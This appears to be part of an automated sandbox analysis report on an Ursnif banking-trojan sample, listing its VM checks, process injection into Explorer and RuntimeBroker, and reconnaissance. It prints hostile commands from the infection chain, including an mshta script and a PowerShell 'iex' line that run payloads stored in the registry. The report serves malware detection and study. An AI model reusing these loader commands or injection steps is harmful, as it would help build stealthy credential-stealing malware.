Source: explorer.exe, 00000019.00000000.486258733.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWPw#
Source: explorer.exe, 00000019.00000000.495767986.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: RuntimeBroker.exe, 00000027.00000000.663110926.000002DE46A40000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000019.00000000.491335244.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: FpYf5EGDO9.exe, 00000000.00000002.510522869.000000000222F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000019.00000000.495767986.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0374A2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 44_2_0374A2FE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0373E9AC memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 44_2_0373E9AC

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_00401264 LoadLibraryA,GetProcAddress, 0_2_00401264
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_021BC1C2 push dword ptr fs:[00000030h] 0_2_021BC1C2

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: lycos.com
Source: C:\Windows\explorer.exe Domain query: mail.yahoo.com
Source: C:\Windows\explorer.exe Domain query: login.yahoo.com
Source: C:\Windows\explorer.exe Domain query: www.lycos.com
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe protection: execute and read and write
Allocates memory in foreign processes
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\explorer.exe base: D70000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 1B888A50000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 163C5210000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EAE4200000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27740170000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 35D0000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 8DCB1580 Jump to behavior
Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: 8DCB1580 Jump to behavior
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Writes to foreign memory regions
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Memory written: C:\Windows\System32\control.exe base: 7FF68E5512E0 Jump to behavior
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Memory written: C:\Windows\System32\control.exe base: 7FF68E5512E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 940000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2AE0000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 93C000 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: D70000 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF7D6015FD0 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 1B888A50000 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF7D6015FD0 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2A2057A000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 5557E30000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 163C5210000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: CB290AE000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EAE4200000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: D2F18CF000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27740170000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 35D0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute read Jump to behavior
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 940000 value: 00 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 2AE0000 value: 80 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: PID: 3352 base: 93C000 value: 00 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: PID: 3352 base: D70000 value: 80 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40 Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Thread register set: target process: 2904 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3352 Jump to behavior
Source: C:\Windows\System32\control.exe Thread register set: target process: 3352 Jump to behavior
Source: C:\Windows\System32\control.exe Thread register set: target process: 6080 Jump to behavior
Source: C:\Windows\explorer.exe Thread register set: target process: 4084
Source: C:\Windows\explorer.exe Thread register set: target process: 4176
Source: C:\Windows\explorer.exe Thread register set: target process: 4440
Source: C:\Windows\explorer.exe Thread register set: target process: 4544
Source: C:\Windows\explorer.exe Thread register set: target process: 6088
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP" Jump to behavior
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000019.00000000.485521161.0000000000B68000.00000004.00000020.sdmp Binary or memory string: Progman\Pr
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp Binary or memory string: Progman
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000019.00000000.486258733.0000000008778000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C47A2E cpuid 0_2_03C47A2E
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_00401E22 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_00401E22
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C47A2E RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_03C47A2E
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_00401752 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_00401752

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
